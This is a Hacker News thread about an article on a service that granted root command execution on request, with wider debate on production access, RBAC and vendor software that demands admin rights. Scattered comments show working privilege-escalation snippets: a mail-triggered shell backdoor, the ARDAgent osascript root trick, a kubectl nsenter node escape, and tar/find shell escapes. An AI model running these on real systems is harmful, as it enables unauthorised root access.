Asking nicely for root command execution and getting it
dj_mc_merlin 2021-08-18 01:46:17 +0000 UTC [ - ]
Developers have little RCEs throughout the entire system; it's how they do their jobs. If even systems with millions of dollars' worth of design and security reviews regularly get hacked by people with no internal access to them or their source code, how can you hope to stop someone who already has a foothold and can see into the system, including a bunch of its config files?
The real answer is not to stop developers from doing so. That's a never-ending uphill battle. You implement very good logging and RBAC systems instead. Now everybody could hack the system if they wished to, but they would be sued into oblivion if they tried to do it for nefarious reasons.
IMO the main purpose of RBAC is not really to stop developers from doing malicious things, but to stop the stupid ones from breaking the system. The smart ones will be able to get around whatever safeguards you put in, as some of those safeguards will undoubtedly be designed by people less fortunate or experienced. Not every developer has a good understanding of infosec and its many, _many_ ways of circumventing what seems to be an impossible defence. Unless you know all the tricks in the book already, whatever you write is most definitely gonna be Swiss cheese.
jnwatson 2021-08-18 14:38:05 +0000 UTC [ - ]
It is the least productive environment I've ever been in. It has made me a lot more aware of how much stuff we download from the internet for development, since I can't do that in this situation.
Fortunately, I get paid by the hour.
Thiez 2021-08-18 17:06:21 +0000 UTC [ - ]
acdha 2021-08-18 18:30:26 +0000 UTC [ - ]
eyelidlessness 2021-08-18 03:42:40 +0000 UTC [ - ]
And zero trust is the only way to mitigate that. There are so many bad security takes in this discussion and I’ve barely read half of it. This isn’t an ignorant community. The implication is that every slightly or significantly bad take is compounded by culture and organizational ignorance.
The only solution is systems that can’t be accessed by humans by design. And building better reporting and isolated debugging tools to accommodate that.
closeparen 2021-08-18 05:49:59 +0000 UTC [ - ]
athrowaway3z 2021-08-18 08:58:45 +0000 UTC [ - ]
Your solution isn't wrong. It's just never going to be cheap and simple enough to expect it as a minimum for every organization.
ramraj07 2021-08-18 04:42:23 +0000 UTC [ - ]
MattPalmer1086 2021-08-18 08:13:58 +0000 UTC [ - ]
concordDance 2021-08-18 11:14:29 +0000 UTC [ - ]
MattPalmer1086 2021-08-18 12:01:32 +0000 UTC [ - ]
I've just spent a fair bit of time working on allowing very limited access to prod by devs to investigate core dumps. Took a lot of argument to get that, but the alternative was moving the core dumps out of prod, and that wouldn't fly due to the sensitivity of data that might be exposed. It's certainly not easy working in a highly secure environment.
mrweasel 2021-08-18 08:21:15 +0000 UTC [ - ]
mr-wendel 2021-08-18 00:14:58 +0000 UTC [ - ]
Maybe this is our version of the "infinite monkeys" thing: given enough software people, enough computers, and enough time, someone at a company will eventually grant universal remote root access to anyone who knows how to read some source code.
At one job, way back in the day, I had a dream that a shared web-hosting installer framework could give you root on whatever server hosted your stuff. Went to work the next day and indeed... it was true and trivially easy to exploit. Sadly, it was a custom wallpaper upload feature that ended up being the actual source of shenanigans. You get 3 guesses on what happened and probably need just one.
mewse 2021-08-18 00:59:25 +0000 UTC [ - ]
You.. quickly found the issue and patched it, and then balloons and streamers fell from the ceiling as the CEO strode over to shake your hand and pat you on the back and crack open a bottle of champagne to celebrate your promotion and give you a hefty performance bonus for saving the company and Dave Matthews played on the company’s sound system while everyone cheered for you and then when you finally left the celebration and went home you were tired and happy and newly wealthy and had become best friends with literally everyone at the company.
…right?
dredmorbius 2021-08-18 06:54:39 +0000 UTC [ - ]
The corresponding law of enterprise software: "Every program expands to provide root access to any arbitrary entity."
lccarrasco 2021-08-18 01:03:56 +0000 UTC [ - ]
They had no validation on file type and you could upload & access a script that executed commands server-side?
mr-wendel 2021-08-18 16:56:23 +0000 UTC [ - ]
It's really not pretty what can happen when you have a juicy target, plenty of time, and a perfect idea of how you can use it to your advantage.
Fortunately they weren't at all malicious... just looking for ways to grow their little empire to play their war games and hopefully make some cash.
ufo 2021-08-18 01:04:25 +0000 UTC [ - ]
TomVDB 2021-08-18 00:44:43 +0000 UTC [ - ]
He ran a service that piped all incoming emails to a script. If an email contained a magic cookie, the subsequent commands were executed in a shell, and the results emailed back to the sender. There were no checks on who the sender was. :-)
I don’t think the IT people at his very big telecom equipment company would have approved. They never found out about this stunt, but he was later fired for running a password cracker on the company server farm.
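A minimal sketch of that kind of mail-to-shell trapdoor (hypothetical — the cookie, paths, and .forward-style wiring are all made up):

```
#!/bin/sh
# Invoked per message via ~/.forward: "|/home/user/mailsh"
msg=$(cat)                                    # entire incoming message on stdin
from=$(printf '%s\n' "$msg" | sed -n 's/^From: *//p' | head -n 1)
# Everything after the magic-cookie line is treated as shell commands.
cmds=$(printf '%s\n' "$msg" | sed -n '/^XYZZY-COOKIE$/,$p' | tail -n +2)
[ -n "$cmds" ] || exit 0                      # no cookie, no execution
printf '%s\n' "$cmds" | sh 2>&1 | mail -s "results" "$from"   # no sender check!
```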
perlgeek 2021-08-18 11:46:03 +0000 UTC [ - ]
He had questionable test/release/deployment practices, so they took his root privs away in prod, and instead made him build packages (that was mostly already done before) and hand them to the admin team.
Not to be deterred by useless administrative overhead, he added an environment variable where the application would look for code files, defaulting it to somewhere under /tmp. Then he could deploy his own hotfixes as a user.
The company only found out when one of the two prod servers was rebooted, /tmp/ was wiped, and suddenly one of the two servers exhibited lots of old, already fixed bugs.
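The mechanism was roughly this shape (a sketch, not the actual code — the real thing apparently loaded application code files rather than shell):

```
# The app prefers "hotfixes" from a directory named by an env var,
# defaulting to somewhere under /tmp (all names hypothetical).
HOTFIX_DIR="${APP_HOTFIX_DIR:-/tmp/app-hotfixes}"
for f in "$HOTFIX_DIR"/*.sh; do
  # Unprivileged "deploys" drop files here -- and vanish when /tmp is wiped.
  [ -e "$f" ] && . "$f"
done
```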
tgsovlerkhgsel 2021-08-18 03:13:44 +0000 UTC [ - ]
TomVDB 2021-08-18 05:38:16 +0000 UTC [ - ]
dredmorbius 2021-08-18 06:51:51 +0000 UTC [ - ]
In the very early 1990s, PGP didn't exist, and the odds that the email content was independently encrypted were low.
Any network sniffer or filesystem access would have exposed the cookie.
Gys 2021-08-18 07:30:16 +0000 UTC [ - ]
I thought all email was still plaintext? The protocol doesn't support encryption?
dredmorbius 2021-08-18 07:53:53 +0000 UTC [ - ]
There is increasing use of encryption-at-rest services (AFAIU Gmail is one, though that's using a system-level, not user-level, key). There are some encrypted email services (e.g., Protonmail) in which contents are encrypted both in flight and at rest.
Not especially relevant to the anecdote here, but a critical concern for messaging opsec: email metadata, including sender, receiver, and subject, is not encrypted at rest and is visible to the originating, receiving, and possibly transit systems. It can leak information, and is often more valuable and useful than the contents themselves.
I find myself wondering if my correspondents who can't seem to provide contextually useful subject lines are actually doing me a favour, despite the annoyance factor ....
JeremyNT 2021-08-18 08:11:23 +0000 UTC [ - ]
Back in the 90s, though... not so much.
dredmorbius 2021-08-18 10:01:22 +0000 UTC [ - ]
https://datatracker.ietf.org/doc/html/rfc2487
Actual widespread implementation didn't occur until the 2010s.
STARTTLS Everywhere launched in 2018. https://www.eff.org/deeplinks/2020/04/winding-down-starttls-...
Google have tracked the prevalence of TLS-based email connections ... since 2014: https://transparencyreport.google.com/safer-email
notacoward 2021-08-18 12:05:34 +0000 UTC [ - ]
raffraffraff 2021-08-18 11:56:57 +0000 UTC [ - ]
Did that company fail? Nope. IPO'd for billions. And most of the people who put out fires like those for years while the founders told us to our faces that we'd all be rich... got sod-all.
citrin_ru 2021-08-18 08:27:24 +0000 UTC [ - ]
I don't change jobs often enough to say that this is how every largish company works, but it's typical that if you point out a security hole, people are displeased (now they have to fix it). And if you don't want many enemies, it's better to ignore security problems unless you can fix them yourself.
That partially explains the very sad state of corporate security.
speedgoose 2021-08-18 04:18:02 +0000 UTC [ - ]
# ARDAgent on older macOS versions was setuid root, so this famously ran the script as root:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
MattPalmer1086 2021-08-18 08:06:48 +0000 UTC [ - ]
In one instance, the service people told me they had to have root because they downloaded arbitrary scripts and executed them, so they couldn't possibly know what permissions would be required ahead of time... Sigh...
isoprophlex 2021-08-18 06:18:55 +0000 UTC [ - ]
People actually have comprehensive overviews of what they're running on their landscape?!
cranekam 2021-08-18 07:22:19 +0000 UTC [ - ]
theblazehen 2021-08-18 06:52:04 +0000 UTC [ - ]
philsnow 2021-08-18 09:49:41 +0000 UTC [ - ]
Johnny555 2021-08-18 01:11:57 +0000 UTC [ - ]
> This change patched the hole
It didn't really patch the hole so much as it moved the hole to every command that was in that whitelist of commands that were ok to run as root. The author doesn't say when this was, but nowadays there are almost certainly better ways to solve this without letting these pre/post setup commands run as root.
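The shape of the problem is the same as a too-loose sudoers whitelist. A hypothetical illustration (the entries are made up; the escapes are classic, documented tricks):

```
# /etc/sudoers fragment: the commands are "whitelisted", but their
# arguments aren't, so each line is still root-for-the-asking.
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl  # pager escape: "!sh" from less
deploy ALL=(root) NOPASSWD: /usr/bin/rsync      # rsync -e 'sh -c ...' runs commands
```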
yjftsjthsd-h 2021-08-18 02:14:13 +0000 UTC [ - ]
tyingq 2021-08-18 01:26:45 +0000 UTC [ - ]
hutzlibu 2021-08-18 07:38:24 +0000 UTC [ - ]
How?
The only clean solution I see (now or anytime in the past) would be to rewrite that "Actual Business Stuff" as a whole.
But that is expensive, maybe very expensive (I think this was clients' code, and going around telling them to change possibly complex code of theirs ... is not something you want or can afford to do). So they just patched the hole up as much as they could.
So I do consider it a patch (especially if the hardcoded commands as strings are verified commands and do not change or invoke something else), just maybe not one that provides full security. But when you look at the state of things in IT in general ... I would say there is indeed improvement if at least gaping holes like this one get fixed.
Johnny555 2021-08-18 15:50:26 +0000 UTC [ - ]
No way to answer that without knowing why it needs root.
> especially if the hardcoded commands as strings are verified commands and do not change or invoke something else
But now that invoked program becomes another weak link that can be exploited. And you don't even know what those invoked commands are, so you don't know if anything can be hardcoded other than the path to the executable.
Yes, it's an improvement in security, but it's only one step that probably won't be revisited until, for example, someone finds out that there's an easily exploited buffer overflow in one of those invoked programs that run as root.
ericbarrett 2021-08-18 03:29:42 +0000 UTC [ - ]
h2odragon 2021-08-18 03:39:16 +0000 UTC [ - ]
https://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely...
hnick 2021-08-18 03:30:01 +0000 UTC [ - ]
So I just replaced the executable with a wrapper that checked what was calling it, then called the real one if allowed. I can't remember how, but we probably blocked the original executable from general use; even if we didn't, bypassing this check shows clear intent on the user's part. They can't claim ignorance, which is enough if it shows up in source code later or dies when we finally remove this software. Meanwhile we could move the other users one by one without any new ones sprouting up.
Of course, code reviews, check-in filters, and such might be a nicer solution but this place wasn't that organised. So we did what we could, and didn't really have to keep an active eye out.
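A minimal sketch of that kind of shim (details hypothetical, not the original):

```
#!/bin/sh
# Installed in place of the real binary, which was moved aside.
REAL=/opt/vendor/bin/tool.real
parent=$(ps -o comm= -p "$PPID")      # name of the calling process
case "$parent" in
  legacy_app|nightly_job)             # callers still allowed, for now
    exec "$REAL" "$@" ;;
  *)
    logger -t tool-shim "blocked $parent (uid $(id -u)) args: $*"
    echo "this tool is being retired; contact the platform team" >&2
    exit 1 ;;
esac
```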
sigjuice 2021-08-18 03:31:40 +0000 UTC [ - ]
breput 2021-08-18 03:56:50 +0000 UTC [ - ]
For example, a SEV 0 would be a total system unavailability incident, SEV 1 might be a major issue with parts of the system, SEV 3 is a less critical failure affecting a subset of users, etc.
You'll typically have a postmortem meeting afterwards to discuss the incident, the root cause, lessons learned, and action items to prevent future occurrences, which is the meeting described in the article.
amacneil 2021-08-18 03:59:07 +0000 UTC [ - ]
E.g.
https://www.gremlin.com/community/tutorials/how-to-establish...
https://www.atlassian.com/incident-management/kpis/severity-...
kaptain 2021-08-18 08:57:46 +0000 UTC [ - ]
raesene9 2021-08-18 08:10:20 +0000 UTC [ - ]
Docker/ContainerD/CRI-O etc are basically command execution as a service.
Kubernetes is basically distributed command execution as a service.
You can add controls to reduce/remove the risk of random people creating root processes on your cluster nodes, but out of the box it's usually possible.
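For example, with nothing more than permission to create pods, the standard (well-documented) trick is a privileged pod with hostPID that nsenters into the node's PID 1 — i.e., a root shell on the node itself:

```
kubectl run r00t --restart=Never -it --rm --image=alpine \
  --overrides='{"spec":{"hostPID":true,"containers":[{"name":"r00t",
    "image":"alpine","stdin":true,"tty":true,
    "securityContext":{"privileged":true},
    "command":["nsenter","--target","1","--mount","--uts","--ipc",
               "--net","--pid","--","sh"]}]}}'
```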
0xbadcafebee 2021-08-18 00:04:50 +0000 UTC [ - ]
Assume your service is a remote exploit machine, and that you want to make it as inconvenient to exploit, and as easy to fix, as possible. (If you don't think your service is a remote exploit machine... I have news for you...)
geofft 2021-08-18 00:25:07 +0000 UTC [ - ]
If you let in any user from the company, what difference does it make that it required authentication beforehand? (As the article points out, it could make a difference in incident response if the service is conscientious about logging and log retention, but that's a whole different feature that "authentication" doesn't get you for free!)
If you let in a restricted set of users from the company, that's now a business-logic change, not just a technical toggle. How do you determine which users are allowed to use and which ones aren't?
outworlder 2021-08-18 00:37:43 +0000 UTC [ - ]
No it isn't. Just deploy a proxy in front of the app. Nginx works. If you have SSO, presumably you also have some detail on the business unit, or even what corporate mailing lists they are part of. Use that. Only allow requests through if they have been authenticated and the user is allowed to access the app.
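A sketch of what that looks like with nginx's auth_request module (hostnames and the SSO verification endpoint are made up):

```
server {
    listen 443 ssl;
    location / {
        auth_request /sso-verify;           # every request checked first
        proxy_pass http://127.0.0.1:8080;   # the unmodified internal app
    }
    location = /sso-verify {
        internal;
        proxy_pass http://sso.internal/verify;  # 2xx = allow, 401/403 = deny
        proxy_pass_request_body off;
        proxy_set_header Content-Length "";
        proxy_set_header X-Original-URI $request_uri;
    }
}
```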
A business logic change is only needed if you actually need RBAC and have different levels of access permissions.
closeparen 2021-08-18 01:31:59 +0000 UTC [ - ]
geofft 2021-08-18 00:56:53 +0000 UTC [ - ]
What I mean is that the business context around the app have changed, not simply the technical implementation. Whereas the app may previously have been, say, "Anyone in the company can extract structured data out of certain PDF files," the app is now "Approved people in the company can extract structured data out of certain PDF files." How do you get approved? Well, because your app is asserted to be a "remote exploit machine," possibly even the team that runs the app can't just give people access for the asking. They have to demonstrate some genuine business need in a way that's sufficient to satisfy the security department, and the security department might need to be involved.
This is not a change in how the app is deployed; it is a change in what the app is. It changes the project definition, because the requirement "Anyone at the company can..." not only got dropped, it got replaced with "Most people at the company cannot...", and in turn it probably changes whether upper management wanted to assign people to work on the project at all. If it's getting limited use, maybe it wasn't worth building an app for it at all and people should have just transcribed data by hand. Or maybe there was a mediocre SaaS that would do 50% of the job for you, and exploits are their problem, and you should have decided to buy the mediocre thing instead of building a better thing that not enough people can use.
closeparen 2021-08-18 01:37:16 +0000 UTC [ - ]
Is that seriously a thing? I've often known a security team to demand that something go behind an ACL, and to set some general standards for the management of that ACL (periodic reviews, expiring inactive users, etc), but never to get involved with specific members.
db48x 2021-08-18 07:05:56 +0000 UTC [ - ]
fvold 2021-08-18 08:35:21 +0000 UTC [ - ]
Some corporations have morons for security auditors.
MattPalmer1086 2021-08-18 08:42:01 +0000 UTC [ - ]
Adding authorization might involve business logic changes I guess, but who is authorised is a business decision achieved with config/administration, not hard coded into the software... I would hope!
gamacodre 2021-08-18 00:32:55 +0000 UTC [ - ]
If users are involved, then yeah you also need some kind of RBAC for it to make any sense.
oh_sigh 2021-08-18 01:15:28 +0000 UTC [ - ]
yjftsjthsd-h 2021-08-18 01:58:34 +0000 UTC [ - ]
I hate to break it to you, but nothing in that blog is unusual in Enterprise in my experience. You appear to have been quite lucky:)
bjenkins358 2021-08-18 02:04:13 +0000 UTC [ - ]
oh_sigh 2021-08-18 02:59:54 +0000 UTC [ - ]
yuliyp 2021-08-18 04:02:46 +0000 UTC [ - ]
bigiain 2021-08-18 01:55:31 +0000 UTC [ - ]
oh_sigh 2021-08-18 03:00:24 +0000 UTC [ - ]
howinteresting 2021-08-18 03:24:44 +0000 UTC [ - ]
Obviously some of the specifics have to be elided because they're proprietary information, though.
Rachel is one of the very best SREs on the planet. Working with her has been one of the greatest privileges of my professional career.
atoav 2021-08-18 05:08:47 +0000 UTC [ - ]
This is like seeing a four inch crack during the construction of a bridge and still pressing on till it collapses. No, it actually is like planning a four inch wide crack into a bridge and finding it through a random inspection a year after. It should not only never happen, it should never even have been considered.
I understand that implementing a quick "do whatever you want"-feature might be practical but:
- anything that could get arbitrary strings from network input (or from anything else that has network input) needs to be validated and sanitized
- anything that dispatches commands on a machine from user/network input should run with the lowest possible privilege
- whitelisting is always simpler than blacklisting, but never underestimate what a few whitelisted unix commands with arbitrary arguments can do (see the sketch below). Maybe writing your own simple DSL is better for such a use case. It could even turn out to be a selling factor if it has a nice GUI
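To make the "never underestimate" point concrete — two classic escapes (standard examples, not from the article) where the whitelisted command itself is harmless but its arguments are not:

```
# Both spawn a shell despite "only" tar/find being whitelisted:
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
find /etc -maxdepth 0 -exec /bin/sh \;
```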
brianpan 2021-08-18 06:10:31 +0000 UTC [ - ]
I'm not sure what else we'll need, let me add some pre/post flexibility.
We have this useful tool let's use it for more things.
Let's standardize on this. Who wrote this? It's ok, we'll do a readiness review.
We have WHAT in production? This is going to make a crazy blog post.
atoav 2021-08-18 07:10:07 +0000 UTC [ - ]
Sure, I sometimes have somewhat high standards compared to others, but how are we ever gonna fix software if we don't stop with the "let me quickly..."?
If you e.g. handle people's private data, you should code as if every character you type had the ability to leak a person's data forever (because often it has). Programming is beautiful because it multiplies. If you do a good job, the fruits of your work can make many people's lives better. The same is true in the other direction: with great power comes great responsibility.
I also happen to be a certified electrical engineer. There you also have situations where you'd want to "just quickly" fix something. Only that you don't do it because you would be liable if you burn someone's house down or kill them.
I'd love for the whole field to get a little bit more serious about the impact our work has if done badly.
cranekam 2021-08-18 07:25:29 +0000 UTC [ - ]
(Source: familiar with the incident)
hug 2021-08-18 00:12:17 +0000 UTC [ - ]
Metasploit just pops up a UAC prompt asking for escalation. Yes or no. Over and over and over again.
On any machine logged into by a local administrator user, if they're the standard kind of careless user, they'll just click yes without thinking and they're owned. If they're cautious, and on a box where UAC presents as a modal dialog, as per its default config, this essentially locks the user out of the OS until they click "yes"... and they're owned.
On an assessment we did at a local 200-seat business where they ran with admin rights on their local boxes, we got about a 90% escalation rate. The other 10% of people got up from their desks and went to ask the IT guy, which we considered a "pass" in that scenario.
Interesting stuff.
smcl 2021-08-18 10:23:19 +0000 UTC [ - ]
corty 2021-08-18 12:14:31 +0000 UTC [ - ]
wcarss 2021-08-18 13:47:04 +0000 UTC [ - ]
I think password managers matching domains with credentials might help a little here, but it normalizes finding random tabs with "google" asking for creds, to below the point of noticing. It often happens right as I log in in the morning to go into my first meetings, and I'm rushed.
Somewhere, someone has likely exploited this by now.
newbamboo 2021-08-18 14:54:59 +0000 UTC [ - ]
noneeeed 2021-08-18 12:46:02 +0000 UTC [ - ]
We've recently been acquired and the new company uses Outlook. I can't use the desktop app as it constantly asks me to go through the full authentication process. I have to use the web interface, which is just fine for me as I mostly use macOS native apps for mail and calendar. I only use Outlook to report phishing emails.
WrtCdEvrydy 2021-08-18 00:26:07 +0000 UTC [ - ]
We had a similar issue with a library that wouldn't install unless run as root, so one of the developers just put his username/password into the box in a plaintext file so the script could basically assume it from the command line when needed... and told no one about it.
hug 2021-08-18 00:51:39 +0000 UTC [ - ]
"Our application needs to run as domain admin". No, mate, it absolutely does not. "Well it definitely needs local admin". No, mate, it doesn't even need that. What it usually needs is write-access to a single folder or regkey somewhere that has default ACLs on it that only allow local admins, but trying to have that conversation is a waste of time.
Of course as soon as you say something like that, all support bets are off. Depending on the business you're working for you either suck it up so you have a 'support agreement' in place, or you do it properly and never talk to the vendor again. (Or option #3, you rebuild the app in its default "holy shit this is how my business gets owned" mode, place a support call, and have them fix that instance while you watch so you can replicate their efforts elsewhere.)
Most of the same set of vendors get their panties in a twist when you tell them their database is on RDS, too, but that's a whole different argument to have with these people.
jasonjayr 2021-08-18 01:00:53 +0000 UTC [ - ]
1) only ran in MSIE
2) required the domain policy to permit VBScript
3) required permission to launch + invoke local COM/applications
4) served over http://
All just so they could direct MSWord to directly print the server-side generated Sales Order template.
I audibly gasped and asked if they knew this put our systems at extreme risk, and the tech talking me through it basically shrugged "it's how it works"
Thankfully that webapp 'upgraded' years ago so that's no longer how it's done, but when it's the only way to get orders into your business from one of your top 10 customers, you just set up a workstation to do it :(
djrogers 2021-08-18 02:58:48 +0000 UTC [ - ]
20 years on the vendor side, and I can count on one hand the number of times a customer followed the recommended process to create a limited user for one of our AD services. Every other time - just run it as an admin service account, and if they're feeling motivated we might get a dedicated admin account created.
It’s very frustrating…
z3t4 2021-08-18 05:53:15 +0000 UTC [ - ]
pjc50 2021-08-18 07:42:00 +0000 UTC [ - ]
Loranubi 2021-08-18 09:10:27 +0000 UTC [ - ]
schlowmo 2021-08-18 02:01:00 +0000 UTC [ - ]
Well this works the other way around too. I found this especially true when delivering software which is considered an interim solution.
More than once I got root privileges on customer machines, or saw my software run as root, because the project owner found it too cumbersome to deal with his own employer's security regulations. Or just wasn't given the budget to deal with it properly. Sometimes it's easier to get an exception than to follow protocol.
This comes back to haunt you if something goes wrong or an interim solution wasn't so interim after all. If someone responsible for auditing permissions asks at this later stage, it was always the vendor's fault.
anyfoo 2021-08-18 02:16:01 +0000 UTC [ - ]
franga2000 2021-08-18 10:58:26 +0000 UTC [ - ]
If the software limited me to not running as root, I would have probably spent far longer debugging other issues and digging through 100s of lines of strace output.
mauvehaus 2021-08-18 13:24:00 +0000 UTC [ - ]
And using them in prod should be grounds for dismissal, or at least pretty severe legal liability if things go wrong as a result.
[0] https://m.youtube.com/watch?v=F3d_Cu5Mzbk
franga2000 2021-08-18 16:13:10 +0000 UTC [ - ]
user5994461 2021-08-18 01:14:03 +0000 UTC [ - ]
Large companies stopped giving out administrator access years ago. The vendor can corrupt their way into some middle manager all they want; middle managers have zero power over procurement and IT, and users won't get administrator access to use the app.
If the app is really unusable, which it is, that must be preventing a whole lot of sales.
hug 2021-08-18 01:34:06 +0000 UTC [ - ]
This is untrue for low-end enterprise. Orgs with up to 10,000 seats run weird shitty local-admin-required products all over the place, usually due to legacy.
In consulting, I would regularly run into core LOB apps that not only required local admin but "couldn't" run as a Windows service and required a user to be logged on with the UI window open in order to function.
You spend hours using the associated Microsoft toolkit & various shims to make the product function without it, but there's always another business that just does it the lazy way.
hhh 2021-08-18 01:24:50 +0000 UTC [ - ]
You can find more information about this here: https://docs.microsoft.com/en-us/windows/deployment/planning...
I run a VM that stays up to date with the latest Windows version that I install the toolkit on for testing.
(side tangent, the user of this application insisted they had the latest version, and with it being behind some login that required some form related to ITAR or something to register, we just had to trust him until I had him download it 'just in case.')
rckoepke 2021-08-19 00:05:17 +0000 UTC [ - ]
I'm also trying to use libpcap and USBPcap without local admin. They request UAC every time I open Wireshark to start a new capture session. (Needed for debugging raw Ethernet and serial stacks)
If you have any tips for either of these I am all ears!
corty 2021-08-19 08:26:06 +0000 UTC [ - ]
jcrites 2021-08-18 01:47:24 +0000 UTC [ - ]
I'm a software developer and wouldn't have it any other way. Software developers need root/admin access if you expect any development velocity and ability to solve problems in production with expedience. There are too many diagnostic operations that depend on having root/admin, and especially fixes to errors.
One exception might be if the production fleet is handled by a separate operations team – but I'm not in favor of this model, which has its own negative impact on velocity/delivery speed due to the coordination involved, and the tension between "software developers want to ship" and "operations team wants software to remain unchanging and stable".
I'm not in favor of operations teams until the software team is overwhelmed with support requests and their velocity is slowing down. In that case, I'd start with beefing up the support team; and then finally at tremendous scale with high operational burden, hire an operations team / SRE team to operate the system.
The solution is to make software teams responsible for owning/operating their own systems until they are extremely large scale (Amazon S3 scale) – a scale so large that rare spontaneous faults would eat up a significant percentage of the overall software team's time. I'm not opposed to having frontline customer support in front of the developers, potentially multiple tiers (since a lot of customers need to Read The Fine Manual); but once the escalation hits a developer, to expeditiously solve the problem they need root/admin.
Your software developers' root/admin access should still be logged, such that the central security team can observe what's going on on every machine at the company, via configuration of SSHD and regular inspection of that config – e.g. a shell that logs off-box command execution in real time by default, either for all commands or for commands run as root. This will capture what they're doing unless they go very far out of their way to conceal and obfuscate their activities; even then, the initial steps to begin the concealment will show up in the logs, unless very well obfuscated.
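One concrete mechanism for that kind of logging — a sketch using Linux's auditd, not a claim about what any particular company runs:

```
# Record every execve performed as root, tagged for later review/SIEM export:
auditctl -a always,exit -F arch=b64 -S execve -F euid=0 -k root-cmds
ausearch -k root-cmds -i    # inspect what root actually ran
```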
Lastly, if your team runs public web servers, then you need to listen on ports like 80 and 443, which requires root. Well-written servers drop root immediately after opening the socket, but custom-written servers may run on those ports without dropping capabilities or running in a container. For example, Facebook Messenger Platform's onboarding instructions and example code – https://developers.facebook.com/docs/messenger-platform/gett... – recommend binding a TCP port >1024:
```
app.listen(process.env.PORT || 1337, () => console.log('webhook is listening'));
```
Aside: Nice and professional port number there. If I'd written that documentation I would have used 8081 or 8443, and included a discussion of the implications of running a web server on HTTPS (443) or HTTP (80).
I understand that software developers having root/admin on their machines is very different from non-tech jobs, but for any job in the engineering family it's essential. The builders and operators of a system should always have root access to it, because (1) it's needed for development throughput, and (2) they can trivially get root access anyway through a variety of means, such as incorporating a grant of root access into the code they're shipping, with minor obfuscation.
At my last company I was also involved in a major effort to make it easier to not run software as root. However, for "typical" services running on single-purpose machines or virtual machines that don't do anything but receive or process commands from other software, and don't run any other software (besides company infra), I think the risk is low. "root" and "nobody" are marginally different on a machine that runs a single application, because an attacker who breaks in can access all of its data anyway.
It's true that with root an attacker can implant rootkits and more firmly maintain a grasp of the server, but competent FAANG companies (1) require MFA in order to log in to servers beyond the initial hardware client in front of the user, and (2) will audit machines for unexpected changes like what I'm describing above. I'm guessing only highly sophisticated attackers like APTs would be able to hide from those scans, and there will always be the record of the initial penetration to review. Incident response will quickly fan out to all machines the pwned machine has communicated with. One of the FAANGs had complete network logs for machines like this and would have been able to inspect the network traffic.
Lastly, sophisticated corps employ defense-in-depth and multiple layers of redundancy like (1) you can't attempt to log into machines on the network without both being on the VPN and having authenticated certificates from the enterprise root authority, and (2) Bastion machines which can log commands being sent to machines even if the machines themselves don't, and so on.
hug 2021-08-18 02:12:46 +0000 UTC [ - ]
For one, devs don't need root in prod in the vast majority of shops, which aren't FAANG scale. Assuming a nice sane environment where your deploys to pre-prod mirror your prod environment, I can't think of many cases where having root on prod makes much difference. It's the inverse of your statement, where places that aren't massive should find it feasible to 1:1 their prod environment for the devs to noodle about in.
For two, statements like this one make me wary of a blanket policy of devs getting root:
> if your team runs public web servers, then you need to listen on ports like 80 and 443, which requires root.
Have you heard of setcap and CAP_NET_BIND_SERVICE, perhaps? I know this is only one example of many where you may "need" root, but in a lot of cases devs just don't have the ops knowledge to know what they actually need.
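For reference, the capability route looks like this (binary path hypothetical):

```
# Let the binary bind ports <1024 without ever running as root:
sudo setcap 'cap_net_bind_service=+ep' /opt/app/bin/server
getcap /opt/app/bin/server    # verify: ... cap_net_bind_service=ep
```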
lmm 2021-08-18 06:37:35 +0000 UTC [ - ]
You can and should mirror the environment, but it's rarely going to be perfect (particularly in terms of traffic), and while it's often worth putting time into better test environments, being able to just hop onto a prod machine and properly trace your programs' behaviour (which often means you need BPF probes or similar) is a gamechanger for fixing production problems quickly.
> Have you heard of setcap and CAP_NET_BIND_SERVICE, perhaps? I know this is only one example of many where you may "need" root, but in a lot of cases devs just don't have the ops knowledge to know what they actually need.
We absolutely don't. Would learning it actually be a good use of time though? Linux user accounts are not generally seen as a hard security boundary, local root exploits are ten-a-penny, and the user account that's running the service necessarily has full access to the actually important stuff (user data) anyway. Particularly in this age of disposable VMs for single processes, I'd think the cost-benefit favours running everything as root, giving developers root, and structuring your security model so that your servers don't trust each other.
jcrites 2021-08-18 02:26:27 +0000 UTC [ - ]
Meanwhile, as a developer you still need the ability to deploy applications unless some kind of "deployment layer" handles depositing new software versions onto the machine.
I'm also concerned about the lack of root for being able to inspect what's going wrong with software on the machine (`ps` and `lsof` and socket-specific equivalents). How do I take a heap dump or stack trace from erroneous software on a prod machine without root? How can I step through the software in a debugger? (You could argue that I shouldn't do this but it's a tradeoff between velocity and security, the right answer which may depend on the business we're in.)
Containers are kind-of this, but I wouldn't use containers as a security sandbox, since they're not designed for it. User namespaces get close, but I prefer to rely on the hypervisor for this kind of security boundary, not namespaces, cgroups, or containers – because the kernel API is massive and security vulnerabilities are found in it regularly. (Root exploits less often.)
How would you build and operate a server in production without root? I honestly don't have experience with that. All of my experience has been running installation scripts as root, and having personal root access for inspecting/debugging (potentially even live debugger attaching and stepping); unless the `sudo` commands were very carefully managed, I wouldn't be able to use the majority of my standard toolkit for fixing problems, and I wouldn't be able to fix the problems if I found them.
Am I running out of file descriptors because the limit is set too low? OK, bump up the limit. That's a code change but I can initiate an emergency recovery by locally changing it on all machines in the fleet.
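Concretely, that emergency fd-limit bump is a one-liner with util-linux's prlimit (service name hypothetical):

```
pid=$(pgrep -f myservice)
grep 'open files' /proc/$pid/limits              # confirm the limit is the problem
sudo prlimit --pid "$pid" --nofile=65536:65536   # raise soft:hard on the live process
```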
We should also acknowledge that there are different kinds of software systems. If I was working at Coinbase or on Payments at Stripe I might have a different perspective. I previously worked at AWS and now currently work on WhatsApp so I am still incredibly security-conscious, but the level of security required by a product is a negotiable product specification, not a hard-and-fast-rule like the necessary strength of a bridge in civil engineering.
[1] Postfix Architecture: http://www.postfix.org/OVERVIEW.html
chousuke 2021-08-18 06:34:10 +0000 UTC [ - ]
If it's possible for you to log into a server and just become root (hopefully there's at least sudo so you don't log in directly as root), you have to make sure your personal laptop or workstation is encrypted, your SSH key is passphrase-protected and you use an SSH agent (or even an external physical device) to store your private key. Certainly you should not be using passwords to log in anywhere. You should do these things anyway, but the more direct power you have, the more important it becomes.
